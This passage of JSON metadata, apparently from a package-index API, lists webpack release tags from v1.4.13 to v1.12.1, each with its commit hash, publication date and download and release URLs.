4dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"pu